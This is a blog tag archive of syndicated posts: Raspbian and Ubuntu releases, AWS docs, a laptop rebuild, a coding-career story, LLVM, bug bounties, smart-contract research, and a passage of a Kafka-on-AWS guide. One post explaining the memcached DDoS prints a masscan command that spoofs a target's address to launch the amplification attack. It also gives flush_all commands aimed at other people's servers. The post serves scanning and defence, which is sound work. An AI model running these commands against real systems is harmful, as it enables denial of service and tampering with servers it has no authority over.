Tag Archives: bug

Raspbian update: supporting different screen sizes

Post Syndicated from Simon Long original https://www.raspberrypi.org/blog/raspbian-update-screen-sizes/

You may have noticed that we released an updated Raspbian software image yesterday. While the main reason for the new image was to provide support for the new Raspberry Pi 3 Model B+, the image also includes, alongside the usual set of bug fixes and minor tweaks, one significant chunk of new functionality that is worth pointing out.

Updating Raspbian on your Raspberry Pi

How to update to the latest version of Raspbian on your Raspberry Pi.


As a software developer, one of the most awkward things to deal with is what is known as platform fragmentation: having to write code that works on all the different devices and configurations people use. In my spare time, I write applications for iOS, and this has become increasingly painful over the last few years. When I wrote my first iPhone application, it only had to work on the original iPhone, but nowadays any iOS application has to work across several models of iPhone and iPad (which all have different processors and screens), and also across the various releases of iOS. And that’s before you start to consider making your code run on Android as well…

Screenshot of clean Raspbian desktop

The good thing about developing for Raspberry Pi is that there is only a relatively small number of different models of Pi hardware. We try our best to make sure that, wherever possible, the Raspberry Pi Desktop software works on every model of Pi ever sold, and we’ve managed to do this for most of the software in the image. The only exceptions are some of the more recent applications like Chromium, which won’t run on the older ARMv6 processors in the Pi 1 and the Pi Zero, and some applications that run very slowly due to needing more memory than the older platforms have.

Raspbian with different screen resolutions

But there is one area where we have no control over the hardware, and that is screen resolution. The HDMI port on the Pi supports a wide range of resolutions, and when you include the composite port and display connector as well, people can be using the desktop on a huge number of different screen sizes.

Supporting a range of screen sizes is harder than you might think. One problem is that the Linux desktop environment is made up of a large selection of bits of software from various different developers, and not all of these support resizing. And the bits of software that do support resizing don’t all do it in the same way, so making everything resize at once can be awkward.

This is why one of the first things I did when I started working on the desktop was to create the Appearance Settings application in order to bring a lot of the settings for things like font and icon sizes into one place. This avoids users having to tweak several configuration files whenever they want to change something.

Screenshot of appearance settings application in Raspbian

The Appearance Settings application was a good place to start when it came to supporting different screen sizes. One of the features I originally included was a button to set everything to a default value. This was really a default setting for screens of an average size, and the resulting defaults would not have worked that well on much smaller or much larger screens. Now, there is no longer a single defaults button, but a new Defaults tab with multiple options:

Screenshot of appearance settings application in Raspbian

These three options adjust font size, icon size, and various other settings to values which ought to work well on screens with a high or low resolution. (The For medium screens option has the same effect as the previous defaults button.) The results will not be perfect in all circumstances and for all applications — as mentioned above, there are many different components used to create the desktop, and some of them don’t provide any way of resizing what they draw. But using these options should set the most important parts of the desktop and installed applications, such as icons, fonts, and toolbars, to a suitable size.

Pixel doubling

We’ve added one other option for supporting high resolution screens. At the bottom of the System tab in the Raspberry Pi Configuration application, there is now an option for pixel doubling:

Screenshot of configuration application in Raspbian

We included this option to facilitate the use of the x86 version of Raspbian with ultra-high-resolution screens that have very small pixels, such as Apple’s Retina displays. When running our desktop on one of these, the tininess of the pixels made everything too small for comfortable use.

Enabling pixel doubling simply draws every pixel in the desktop as a 2×2 block of pixels on the screen, making everything exactly twice the size and resulting in a usable desktop on, for example, a MacBook Pro’s Retina display. We’ve included the option on the version of the desktop for the Pi as well, because we know that some people use their Pi with large-screen HDMI TVs.

As pixel doubling magnifies everything on the screen by a factor of two, it’s also a useful option for people with visual impairments.

How to update

As mentioned above, neither of these new functionalities is a perfect solution to dealing with different screen sizes, but we hope they will make life slightly easier for you if you’re trying to run the desktop on a small or large screen. The features are included in the new image we have just released to support the Pi 3B+. If you want to add them to your existing image, the standard upgrade from apt will do so. As shown in the video above, you can just open a terminal window and enter the following to update Raspbian:

sudo apt-get update
sudo apt-get dist-upgrade

As always, your feedback, either in comments here or on the forums, is very welcome.

The post Raspbian update: supporting different screen sizes appeared first on Raspberry Pi.

AWS Documentation is Now Open Source and on GitHub

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/aws-documentation-is-now-open-source-and-on-github/

Earlier this year we made the AWS SDK developer guides available as GitHub repos (all found within the awsdocs organization) and invited interested parties to contribute changes and improvements in the form of pull requests.

Today we are adding over 138 additional developer and user guides to the organization, and we are looking forward to receiving your requests. You can fix bugs, improve code samples (or submit new ones), add detail, and rewrite sentences and paragraphs in the interest of accuracy or clarity. You can also look at the commit history in order to learn more about new feature and service launches and to track improvements to the documents.

Making a Contribution
Before you get started, read the Amazon Open Source Code of Conduct and take a look at the Contributing Guidelines document (generally named CONTRIBUTING.md) for the AWS service of interest. Then create a GitHub account if you don’t already have one.

Once you find something to change or improve, visit the HTML version of the document and click on the Edit on GitHub button at the top of the page:

This will allow you to edit the document in source form (typically Markdown or reStructuredText). The source code is used to produce the HTML, PDF, and Kindle versions of the documentation.

Once you are in GitHub, click on the pencil icon:

This creates a “fork” — a separate copy of the file that you can edit in isolation.

Next, make an edit. In general, as a new contributor to an open source project, you should gain experience and build your reputation by making small, high-quality edits. I’ll change “dozens of services” to “over one hundred services” in this document:

Then I summarize my change and click Propose file change:

I examine the differences to verify my changes and then click Create pull request:

Then I review the details and click Create pull request again:

The pull request (also known as a PR) makes its way to the Elastic Beanstalk documentation team and they get to decide if they want to accept it, reject it, or to engage in a conversation with me to learn more. The teams endeavor to respond to PRs within 48 hours, and I’ll be notified via GitHub whenever the status of the PR changes.

As is the case with most open source projects, a steady stream of focused, modest-sized pull requests is preferable to the occasional king-sized request with dozens of edits inside.
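If you prefer working from the command line rather than in the GitHub web editor, the same kind of contribution can be prepared locally and pushed to your fork. A minimal sketch, assuming you have already forked one of the awsdocs repositories; the repository name, branch name, file path, and commit message below are purely illustrative:

# Clone your fork of an awsdocs repository (names are illustrative)
git clone https://github.com/<your-username>/amazon-ec2-user-guide.git
cd amazon-ec2-user-guide

# Work on a topic branch so the pull request stays small and focused
git checkout -b fix-typo-in-instance-types

# Edit the Markdown/reStructuredText source, then commit and push
git add doc_source/instance-types.md
git commit -m "Fix typo in instance types description"
git push origin fix-typo-in-instance-types

# Finally, open a pull request from that branch on GitHub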

If I am interested in tracking changes to a repo over time, I can Watch and/or Star it:

If I Watch a repo, I’ll receive an email whenever there’s a new release, issue, or pull request for that service guide.

Go Fork It
This launch gives you another way to help us to improve AWS. Let me know what you think!


2018-03-13 Chinese laptop

Post Syndicated from Vasil Kolev original https://vasil.ludost.net/blog/?p=3380

(all laptops are made in China these days anyway, but I can't think of a better name for this)

Some time ago I learned about a project by enthusiasts from China who make new motherboards for old laptops. I had been missing a 4:3 display for a long time, my T420 was slow from time to time (even with 16GB of RAM and an SSD), the newer ThinkPads have an awful keyboard, and the Retro project in the end wasn't customizable and wasn't acceptable (with that NVidia card and a wide display, not to mention the price).

I ordered a T60p from ebay, and once it arrived I set about ordering the motherboard. Through the project's forum and some facebook page I found contacts and corresponded with a person who offered me a complete laptop outright, but I ordered just the board (in hindsight, I should have taken the whole laptop). A few things about the ordering process:
– the payment options were SWIFT and Western Union. I didn't feel like going anywhere, so I paid by SWIFT, and it turned out there are additional fees charged to the recipient (which they cannot collect from me);
– to clear customs I was asked for the following: an invoice (which I had to ask them to issue, because there wasn't one) that includes both the price and the shipping costs, an EORI number, a power of attorney authorising them to represent me, and proof of the payment made (a customs requirement for goods from China and Hong Kong; it says "SWIFT or PayPal");
– you can get an EORI number issued for free if you have an electronic signature and some patience (I had already obtained one for something else; it took about a week);
– DHL can send you what the customs declaration looks like so you can pay it yourself with a single online transfer and receive your goods (otherwise they want 24 leva to make the transfer for you);

The board was $780 plus shipping; the option of this board with a complete laptop (without memory) was $980 with a 1400×1050 panel and $1100 with a 1600×1200 panel (new, IPS, according to the seller).

The project also has a forum with assembly instructions (google translate is your good friend for those pages). In my case the assembly was delayed, because it turned out there is a T60p variant with a 16:10 panel which the board doesn't fit, and that is exactly the one I had bought, so I ordered another and waited for it to arrive.

Then came the assembly, with the help of the good people at adsys (whose lives I made miserable, because it turned out to be rather fiddly work):
– there is a little cutting to do on the case (it's described in the forum, with photos);
– there are fewer mounting screws, and some of the holes are blocked;
– on the board, next to the monitor connector, there is a switch for the display type (1024×768 or larger);
– you need DDR4 memory;
– most likely your old wifi card won't do the job; I took mine from the T420, and it had to be taped in place a bit, because it's a half-size card for the slot and I don't have an adapter;
– the CD drive from the T60 won't fit, because it is PATA while the connector on the board is SATA (not that I use a CD drive). I need to come up with something to plug the hole;

Things still to sort out:
– at least for the moment the GPU doesn't work under linux (it hangs on boot), so I'm using xfwm4 instead of compiz; I've submitted a bug report;
– the top touchpad buttons stop working after suspend/resume; I've made a fix, but I need to work up the will to reboot.

My working environment feels much nicer at 4:3, and I can finally run my email client laid out the way it used to be (folder list on the left, the right side split in two: message list on top, the open message below, instead of three vertical columns that barely fit). Also, with this processor firefox now runs almost decently; once I get the GPU sorted out too, everything will probably fly.

Coding is for girls

Post Syndicated from magda original https://www.raspberrypi.org/blog/coding-is-for-girls/

Less than four years ago, Magda Jadach was convinced that programming wasn’t for girls. On International Women’s Day, she tells us how she discovered that it definitely is, and how she embarked on the new career that has brought her to Raspberry Pi as a software developer.

“Coding is for boys”, “in order to be a developer you have to be some kind of super-human”, and “it’s too late to learn how to code” – none of these three things is true, and I am going to prove that to you in this post. By doing this I hope to help some people to get involved in the tech industry and digital making. Programming is for anyone who loves to create and loves to improve themselves.

In the summer of 2014, I started the journey towards learning how to code. I attended my first coding workshop at the recommendation of my boyfriend, who had constantly told me about the skill and how great it was to learn. I was convinced that, at 28 years old, I was already too old to learn. I didn’t have a technical background, I was under the impression that “coding is for boys”, and I lacked the superpowers I was sure I needed. I decided to go to the workshop only to prove him wrong.

Later on, I realised that coding is a skill like any other. You can compare it to learning any language: there’s grammar, vocabulary, and other rules to acquire.


Alien message in console

To my surprise, the workshop was completely inspiring. Within six hours I was able to create my first web page. It was a really simple page with a few cats, some colours, and ‘Hello world’ text. This was a few years ago, but I still remember when I first clicked “view source” to inspect the page. It looked like some strange alien message, as if I’d somehow broken the computer.

I wanted to learn more, but with so many options, I found myself a little overwhelmed. I’d never taught myself any technical skill before, and there was a lot of confusing jargon and new terms to get used to. What was HTML? CSS and JavaScript? What were databases, and how could I connect together all the dots and choose what I wanted to learn? Luckily I had support and was able to keep going.

At times, I felt very isolated. Was I the only girl learning to code? I wasn’t aware of many female role models until I started going to more workshops. I met a lot of great female developers, and thanks to their support and help, I kept coding.

Another struggle I faced was the language barrier. I am not a native speaker of English, and diving into English technical documentation wasn’t easy. The learning curve is daunting in the beginning, but it’s completely normal to feel uncomfortable and to think that you’re really bad at coding. Don’t let this bring you down. Everyone thinks this from time to time.

Play with Raspberry Pi and quit your job

I kept on improving my skills, and my interest in developing grew. However, I had no idea that I could do this for a living; I simply enjoyed coding. Since I had a day job as a journalist, I was learning in the evenings and during the weekends.

I spent long hours playing with a Raspberry Pi and setting up so many different projects to help me understand how the internet and computers work, and get to grips with the basics of electronics. I built my first ever robot buggy, retro game console, and light switch. For the first time in my life, I had a soldering iron in my hand. Day after day I became more obsessed with digital making.

Magdalena Jadach on Twitter

solderingiron Where have you been all my life? Weekend with #raspberrypi + @pimoroni + @Pololu + #solder = best time! #electricity

One day I realised that I couldn’t wait to finish my job and go home to finish some project that I was working on at the time. It was then that I decided to hand over my resignation letter and dive deep into coding.

For the next few months I completely devoted my time to learning new skills and preparing myself for my new career path.

I went for an interview and got my first ever coding internship. Two years, hundreds of lines of code, and thousands of hours spent in front of my computer later, I have landed my dream job at the Raspberry Pi Foundation as a software developer, which proves that dreams come true.


Where to start?

I recommend starting with HTML & CSS – the same path that I chose. It is a relatively straightforward introduction to web development. You can follow my advice or choose a different approach. There is no “right” or “best” way to learn.

Below is a collection of free coding resources, both from Raspberry Pi and from elsewhere, that I think are useful for beginners to know about. There are other tools that you are going to want in your developer toolbox aside from HTML.

  • HTML and CSS are languages for describing, structuring, and styling web pages
  • You can learn JavaScript here and here
  • Raspberry Pi (obviously!) and our online learning projects
  • Scratch is a graphical programming language that lets you drag and combine code blocks to make a range of programs. It’s a good starting point
  • Git is version control software that helps you to work on your own projects and collaborate with other developers
  • Once you’ve got started, you will need a code editor. Sublime Text or Atom are great options for starting out

Coding gives you so much new inspiration, you learn new stuff constantly, and you meet so many amazing people who are willing to help you develop your skills. You can volunteer to help at a Code Club or CoderDojo to increase your exposure to code, or attend a Raspberry Jam to meet other like-minded makers and start your own journey towards becoming a developer.

The post Coding is for girls appeared first on Raspberry Pi.

LLVM 6.0.0 released

Post Syndicated from corbet original https://lwn.net/Articles/748863/rss

Version 6.0.0 of the LLVM compiler suite is out.
This release is the result of the community’s work over the past six
months, including: retpoline Spectre variant 2 mitigation,
significantly improved CodeView debug info for Windows, GlobalISel by
default for AArch64 at -O0, improved scheduling on several x86
micro-architectures, Clang defaults to -std=gnu++14 instead of
-std=gnu++98, support for some upcoming C++2a features, improved
optimizations, new compiler warnings, many bug fixes, and more.

Some notes on memcached DDoS

Post Syndicated from Robert Graham original http://blog.erratasec.com/2018/03/some-notes-on-memcached-ddos.html

I thought I’d write up some notes on the memcached DDoS. Specifically, I describe how many vulnerable servers I found by scanning the Internet with masscan, and how to use masscan as a kill switch to neuter the worst of the attacks.

Test your servers

I added code to my port scanner for this, then scanned the Internet:
masscan 0.0.0.0/0 -pU:11211 --banners | grep memcached
This example scans the entire Internet (0.0.0.0/0). Replace that with your own address range (or ranges).
This produces output that looks like this:
Banner on port 11211/udp on [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on [memcached] uptime=3935192 time=1520485363 version=1.4.17
Banner on port 11211/udp on [memcached] uptime=230130 time=1520485357 version=1.4.13
Banner on port 11211/udp on [memcached] uptime=399858 time=1520485362 version=1.4.20
Banner on port 11211/udp on [memcached] uptime=29429482 time=1520485363 version=1.4.20
Banner on port 11211/udp on [memcached] uptime=2879363 time=1520485366 version=1.2.6
Banner on port 11211/udp on [memcached] uptime=42083736 time=1520485365 version=1.4.13
The “banners” check filters out those with valid memcached responses, so you don’t get other stuff that isn’t memcached. To filter this output further, use the ‘cut’ command to grab just column 6:
… | cut -d ' ' -f 6 | cut -d: -f1
You often get multiple responses to just one query, so you’ll want to sort/uniq the list:
… | sort | uniq

My results from an Internet wide scan

I got 15181 results (or roughly 15,000).
People are using Shodan to find a list of memcached servers. They might be getting a lot of results back for servers that respond on TCP instead of UDP. Only UDP can be used for the attack.

Other researchers scanned the Internet a few days ago and found ~31k. I don’t know if this means people have been removing these from the Internet.

Masscan as exploit script

BTW, you can not only use masscan to find amplifiers, you can also use it to carry out the DDoS. Simply import the list of amplifier IP addresses, then spoof the source address as that of the target. All the responses will go back to the source address.
masscan -iL amplifiers.txt -pU:11211 --spoof-ip <target-address> --rate 100000
I point this out to show how there’s no magic in exploiting this. Numerous exploit scripts have been released, because it’s so easy.

Why memcached servers are vulnerable

Like many servers, memcached listens on the localhost address (127.0.0.1) for local administration. By listening only on the local IP address, remote people cannot talk to the server.
However, this process is often buggy, and you end up listening either on 0.0.0.0 (all interfaces) or on one of the external interfaces. There’s a common Linux network stack issue where this keeps happening, like trying to get VMs connected to the network. I forget the exact details, but the point is that lots of servers that intend to listen only on localhost end up listening on external interfaces instead. It’s not a good security barrier.
Thus, there are lots of memcached servers listening on their control port (11211) on external interfaces.

How the protocol works

The protocol is documented here. It’s pretty straightforward.
The easiest amplification attack is to send the “stats” command. This is a 15-byte UDP packet that causes the server to send back a large response full of useful statistics about the server. You often see around 10 kilobytes of response across several packets.
A harder, but more effective, attack uses a two-step process. You first use the “add” or “set” commands to put chunks of data into the server, then send a “get” command to retrieve it. You can easily put 100 megabytes of data into the server this way, and cause it all to be retrieved with a single “get” command.
That’s why this has been the largest amplification ever, because a single 100-byte packet can in theory cause a 100-megabyte response.
Doing the math, the 1.3 terabit/second DDoS divided across the 15,000 servers I found vulnerable on the Internet leads to an average of roughly 100 megabits/second per server. This is fairly minor, and is indeed something even small servers (like Raspberry Pis) can generate.
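If you want to see the amplification for yourself against a server you control, you can send the “stats” command by hand, using the same 8-byte UDP frame header as the flush_all packet shown later in this post. A minimal sketch; <memcached-host> is a placeholder for your own test server:
# 8-byte memcached UDP frame header (request id, sequence number,
# total datagram count, reserved), followed by the ASCII "stats" command
echo -en "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" | nc -q1 -u <memcached-host> 11211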

Neutering the attack (“kill switch”)

If they are using the more powerful attack against you, you can neuter it: you can send a “flush_all” command back at the servers that are flooding you, causing them to drop all those large chunks of data from the cache.
I’m going to describe how I would do this.
First, get a list of attackers, meaning the amplifiers that are flooding you. The way to do this is to grab a packet sniffer and capture all packets with a source port of 11211. Here is an example using tcpdump.
tcpdump -i <interface> -w attackers.pcap src port 11211
Let that run for a while, then hit [ctrl-c] to stop, then extract the list of IP addresses in the capture file. The way I do this is with tshark (comes with Wireshark):
tshark -r attackers.pcap -Tfields -eip.src | sort | uniq > amplifiers.txt
Now, craft a flush_all payload. There are many ways of doing this. For example, if you are using nmap or masscan, you can add the bytes to the nmap-payloads.txt file. Also, masscan can read this directly from a packet capture file. To do this, first craft a packet, such as with the following command line foo:
echo -en "\x00\x00\x00\x00\x00\x01\x00\x00flush_all\r\n" | nc -q1 -u <memcached-host> 11211
Capture this packet using tcpdump or something, and save it into a file “flush_all.pcap”. If you want to skip this step, I’ve already done this for you; go grab the file from GitHub.
Now that we have our list of attackers (amplifiers.txt) and a payload to blast at them (flush_all.pcap), use masscan to send it:
masscan -iL amplifiers.txt -pU:11211 --pcap-payload flush_all.pcap

Reportedly, “shutdown” may also work to completely shut down the amplifiers. I’ll leave that as an exercise for the reader, since of course you’ll be adversely affecting the servers.

Some notes

Here is some good reading on this attack:

Security updates for Wednesday

Post Syndicated from ris original https://lwn.net/Articles/748741/rss

Security updates have been issued by Arch Linux (python-django and python2-django), Debian (leptonlib), Fedora (bugzilla, cryptopp, electrum, firefox, freexl, glibc, jhead, libcdio, libsamplerate, libXcursor, libXfont, libXfont2, mingw-wavpack, nx-libs, php, python-crypto, quagga, sharutils, unzip, x2goserver, and xen), Gentoo (exim), openSUSE (cups, go1.8, ImageMagick, jgraphx, leptonica, openexr, tor, and wavpack), Red Hat (389-ds-base, java-1.7.1-ibm, kernel, kernel-rt, libreoffice, and php), SUSE (java-1_7_1-ibm), and Ubuntu (python-django).

Security Vulnerabilities in Smart Contracts

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/03/security_vulner_13.html

Interesting research: “Finding The Greedy, Prodigal, and Suicidal Contracts at Scale“:

Abstract: Smart contracts — stateful executable objects hosted on blockchains like Ethereum — carry billions of dollars worth of coins and cannot be updated once deployed. We present a new systematic characterization of a class of trace vulnerabilities, which result from analyzing multiple invocations of a contract over its lifetime. We focus attention on three example properties of such trace vulnerabilities: finding contracts that either lock funds indefinitely, leak them carelessly to arbitrary users, or can be killed by anyone. We implemented MAIAN, the first tool for precisely specifying and reasoning about trace properties, which employs inter-procedural symbolic analysis and concrete validator for exhibiting real exploits. Our analysis of nearly one million contracts flags 34,200 (2,365 distinct) contracts vulnerable, in 10 seconds per contract. On a subset of 3,759 contracts which we sampled for concrete validation and manual analysis, we reproduce real exploits at a true positive rate of 89%, yielding exploits for 3,686 contracts. Our tool finds exploits for the infamous Parity bug that indirectly locked 200 million dollars worth in Ether, which previous analyses failed to capture.

Setting up bug bounties for success

Post Syndicated from Michal Zalewski original https://lcamtuf.blogspot.com/2018/03/setting-up-bug-bounties-for-success.html

Bug bounties end up in the news with some regularity, usually for the wrong reasons. I’ve been itching to write
about that for a while – but instead of dwelling on the mistakes of the bygone days, I figured it may be better to
talk about some of the ways to get vulnerability rewards right.

What do you get out of bug bounties?

There’s plenty of differing views, but I like to think of such programs
simply as a bid on researchers’ time. In the most basic sense, you get three benefits:

  • Improved ability to detect bugs in production before they become major incidents.
  • A comparatively unbiased feedback loop to help you prioritize and measure other security work.
  • A robust talent pipeline for when you need to hire.

What don’t bug bounties offer?

You don’t get anything resembling a comprehensive security program or a systematic assessment of your platforms.
Researchers end up looking for bugs that offer favorable effort-to-payoff ratios for their skills, given the
very imperfect information they have about your enterprise. In other words, you may end up with a hundred
people looking for XSS and just one person looking for RCE.

Your reward structure can steer them toward the targets and bugs you care about, but it’s difficult to fully
eliminate this inherent skew. There’s only so far you can jack up your top-tier rewards, and only so far you can
go lowering the bottom-tier ones.

Don’t you have to outcompete the black market to get all the “good” bugs?

There is a free market price discovery component to it all: if you’re not getting the engagement you
were hoping for, you should probably consider paying more.

That said, there are going to be researchers who’d rather hurt you than work for you, no matter how much you pay;
you don’t have to win them over, and you don’t have to outspend every authoritarian government or
every crime syndicate. A bug bounty is effective simply if it attracts enough eyeballs to make bugs statistically
harder to find, and reduces the useful lifespan of any zero-days in black market trade. Plus, most
researchers don’t want their work to be used to crack down on dissidents in Egypt or Vietnam.

Another factor is that you’re paying for different things: a black market buyer probably wants a reliable exploit
capable of delivering payloads, and then demands silence for months or years to come; a vendor-run
bug bounty program is usually perfectly happy with a reproducible crash and doesn’t mind a researcher blogging
about their work.

In fact, while money is important, you will probably find out that it’s not enough to retain your top talent;
many folks want bug bounties to be more than a business transaction, and find a lot of value in having a close
relationship with your security team, comparing notes, and growing together. Fostering that partnership can
be more important than adding another $10,000 to your top reward.

How do I prevent it all from going horribly wrong?

Bug bounties are an unfamiliar beast to most lawyers and PR folks, so it’s natural to be wary and try to plan
for every eventuality with pages and pages of impenetrable rules and fine-print legalese.

This is generally unnecessary: there is a strong self-selection bias, and almost every participant in a
vulnerability reward program will be coming to you in good faith. The more friendly, forthcoming, and
approachable you seem, and the more you treat them like peers, the more likely it is for your relationship to stay
positive. On the flip side, there is no faster way to make enemies than to make a security researcher feel that they
are now talking to a lawyer or to the PR dept.

Most people have strong opinions on disclosure policies; instead of imposing your own views, strive to patch reported bugs
reasonably quickly, and almost every reporter will play along. Demand that researchers cancel conference appearances,
take down blog posts, or sign NDAs, and you will sooner or later end up in the news.

But what if that’s not enough?

As with any business endeavor, mistakes will happen; total risk avoidance is seldom the answer. Learn to sincerely
apologize for mishaps; it’s not a sign of weakness to say “sorry, we messed up”. And you will almost certainly not end
up in the courtroom for doing so.

It’s good to foster a healthy and productive relationship with the community, so that they come to your defense when
something goes wrong. Encouraging people to disclose bugs and talk about their experiences is one way of accomplishing that.

What about extortion?

You should structure your program to naturally discourage bad behavior and make it stand out like a sore thumb.
Require bona fide reports with complete technical details before any reward decision is made by a panel of named peers;
and make it clear that you never demand non-disclosure as a condition of getting a reward.

To avoid researchers accidentally putting themselves in awkward situations, have clear rules around data exfiltration
and lateral movement: assure them that you will always pay based on the worst-case impact of their findings; in exchange,
ask them to stop as soon as they get a shell and never access any data that isn’t their own.

So… are there any downsides?

Yep. Other than souring your relationship with the community if you implement your program wrong, the other consideration
is that bug bounties tend to generate a lot of noise from well-meaning but less-skilled researchers.

When this happens, do not get frustrated and do not penalize such participants; instead, help them grow. Consider
publishing educational articles, giving advice on how to investigate and structure reports, or
offering free workshops every now and then.

The other downside is cost; although bug bounties tend to offer far more bang for your buck than your average penetration
test, they are more random. The annual expenses tend to be fairly predictable, but there is always
some possibility of having to pay multiple top-tier rewards in rapid succession. This is the kind of uncertainty that
many mid-level budget planners react badly to.

Finally, you need to be able to fix the bugs you receive. It would be nuts to prefer to not know about the
vulnerabilities in the first place – but once you invite the research, the clock starts ticking and you need to
ship fixes reasonably fast.

So… should I try it?

There are folks who enthusiastically advocate for bug bounties in every conceivable situation, and people who dislike them
with fierce passion; both sentiments are usually strongly correlated with the line of business they are in.

In reality, bug bounties are not a cure-all, and there are some ways to make them ineffectual or even dangerous.
But they are not as risky or expensive as most people suspect, and when done right, they can actually be fun for your
team, too. You won’t know for sure until you try.

Ubuntu 16.04.4 LTS released

Post Syndicated from jake original https://lwn.net/Articles/748447/rss

The fourth update to the Ubuntu 16.04 long-term support distribution has been released; it is available from the “Get Ubuntu” web page. “As usual, this point release includes many updates, and updated
installation media has been provided so that fewer updates will need to
be downloaded after installation. These include security updates and
corrections for other high-impact bugs, with a focus on maintaining
stability and compatibility with Ubuntu 16.04 LTS.

Kubuntu 16.04.4 LTS, Xubuntu 16.04.4 LTS, Mythbuntu 16.04.4 LTS,
Ubuntu GNOME 16.04.4 LTS, Lubuntu 16.04.4 LTS, Ubuntu Kylin 16.04.4 LTS,
Ubuntu MATE 16.04.4 LTS and Ubuntu Studio 16.04.4 LTS are also now
available.” Information about what has changed can be found in the overall release notes and in the release notes for the various Ubuntu flavors.

Best Practices for Running Apache Kafka on AWS

Post Syndicated from Prasad Alle original https://aws.amazon.com/blogs/big-data/best-practices-for-running-apache-kafka-on-aws/

This post was written in partnership with Intuit to share learnings, best practices, and recommendations for running an Apache Kafka cluster on AWS. Thanks to Vaishak Suresh and his colleagues at Intuit for their contribution and support.

Intuit, in their own words: Intuit, a leading enterprise customer for AWS, is a creator of business and financial management solutions. For more information on how Intuit partners with AWS, see our previous blog post, Real-time Stream Processing Using Apache Spark Streaming and Apache Kafka on AWS. Apache Kafka is an open-source, distributed streaming platform that enables you to build real-time streaming applications.

The best practices described in this post are based on our experience in running and operating large-scale Kafka clusters on AWS for more than two years. Our intent for this post is to help AWS customers who are currently running Kafka on AWS, and also customers who are considering migrating on-premises Kafka deployments to AWS.

AWS offers Amazon Kinesis Data Streams, a Kafka alternative that is fully managed.

Running your Kafka deployment on Amazon EC2 provides a high performance, scalable solution for ingesting streaming data. AWS offers many different instance types and storage option combinations for Kafka deployments. However, given the number of possible deployment topologies, it’s not always trivial to select the most appropriate strategy suitable for your use case.

In this blog post, we cover the following aspects of running Kafka clusters on AWS:

  • Deployment considerations and patterns
  • Storage options
  • Instance types
  • Networking
  • Upgrades
  • Performance tuning
  • Monitoring
  • Security
  • Backup and restore

Note: While implementing Kafka clusters in a production environment, make sure also to consider factors like your number of messages, message size, monitoring, failure handling, and any operational issues.

Deployment considerations and patterns

In this section, we discuss various deployment options available for Kafka on AWS, along with pros and cons of each option. A successful deployment starts with thoughtful consideration of these options. Considering availability, consistency, and operational overhead of the deployment helps when choosing the right option.

Single AWS Region, Three Availability Zones, All Active

One typical deployment pattern (all active) is in a single AWS Region with three Availability Zones (AZs). One Kafka cluster is deployed in each AZ along with Apache ZooKeeper and Kafka producer and consumer instances as shown in the illustration following.

In this pattern, this is the Kafka cluster deployment:

  • Kafka producers and Kafka cluster are deployed on each AZ.
  • Data is distributed evenly across three Kafka clusters by using Elastic Load Balancer.
  • Kafka consumers aggregate data from all three Kafka clusters.

Kafka cluster failover occurs this way:

  • Mark down all Kafka producers
  • Stop consumers
  • Debug and restack Kafka
  • Restart consumers
  • Restart Kafka producers

Following are the pros and cons of this pattern.

Pros:
  • Highly available
  • Can sustain the failure of two AZs
  • No message loss during failover
  • Simple deployment

Cons:
  • Very high operational overhead:
    • All changes need to be deployed three times, one for each Kafka cluster
    • Maintaining and monitoring three Kafka clusters
    • Maintaining and monitoring three consumer clusters

A restart is required for patching and upgrading brokers in a Kafka cluster. In this approach, a rolling upgrade is done separately for each cluster.

Single Region, Three Availability Zones, Active-Standby

Another typical deployment pattern (active-standby) is in a single AWS Region with a single Kafka cluster and Kafka brokers and Zookeepers distributed across three AZs. Another similar Kafka cluster acts as a standby as shown in the illustration following. You can use Kafka mirroring with MirrorMaker to replicate messages between any two clusters.
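As a rough illustration, MirrorMaker ships with Kafka and can be run from the command line; the property files and topic pattern below are placeholders that you would point at your own active and standby clusters:
# consumer.properties points at the active cluster, producer.properties at the standby cluster;
# the ".*" whitelist mirrors every topic
kafka-mirror-maker.sh \
  --consumer.config consumer.properties \
  --producer.config producer.properties \
  --whitelist ".*"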

In this pattern, this is the Kafka cluster deployment:

  • Kafka producers are deployed on all three AZs.
  • Only one Kafka cluster is deployed across three AZs (active).
  • ZooKeeper instances are deployed on each AZ.
  • Brokers are spread evenly across all three AZs.
  • Kafka consumers can be deployed across all three AZs.
  • Standby Kafka producers and a Multi-AZ Kafka cluster are part of the deployment.

Kafka cluster failover occurs this way:

  • Switch traffic to standby Kafka producers cluster and Kafka cluster.
  • Restart consumers to consume from standby Kafka cluster.

Following are the pros and cons of this pattern.

Pros:
  • Less operational overhead when compared to the first option
  • Only one Kafka cluster to manage and consume data from
  • Can handle single AZ failures without activating a standby Kafka cluster

Cons:
  • Added latency due to cross-AZ data transfer among Kafka brokers
  • For Kafka versions before 0.10, replicas for topic partitions have to be assigned so they’re distributed to the brokers on different AZs (rack-awareness)
  • The cluster can become unavailable in case of a network glitch, where ZooKeeper does not see Kafka brokers
  • Possibility of in-transit message loss during failover

Intuit recommends using a single Kafka cluster in one AWS Region, with brokers distributed across three AZs (single region, three AZs). This approach offers stronger fault tolerance, because a failed AZ won’t cause Kafka downtime.

Storage options

There are two storage options for file storage in Amazon EC2: ephemeral storage (instance store) and Amazon Elastic Block Store (EBS).

Ephemeral storage is local to the Amazon EC2 instance. It can provide high IOPS based on the instance type. On the other hand, Amazon EBS volumes offer higher resiliency and you can configure IOPS based on your storage needs. EBS volumes also offer some distinct advantages in terms of recovery time. Your choice of storage is closely related to the type of workload supported by your Kafka cluster.

Kafka provides built-in fault tolerance by replicating data partitions across a configurable number of instances. If a broker fails, you can recover it by fetching all the data from other brokers in the cluster that host the other replicas. Depending on the size of the data transfer, it can affect the recovery process and network traffic. These in turn eventually affect the cluster’s performance.

The following table contrasts the benefits of using an instance store versus using EBS for storage.

Instance store:
  • Instance storage is recommended for large- and medium-sized Kafka clusters. For a large cluster, read/write traffic is distributed across a high number of brokers, so the loss of a broker has less of an impact. For smaller clusters, however, a quick recovery of the failed node is important, and recovering a failed broker takes longer and requires more network traffic.
  • Storage-optimized instances like h1, i3, and d2 are an ideal choice for distributed applications like Kafka.

EBS:
  • The primary advantage of using EBS in a Kafka deployment is that it significantly reduces data-transfer traffic when a broker fails or must be replaced. The replacement broker joins the cluster much faster.
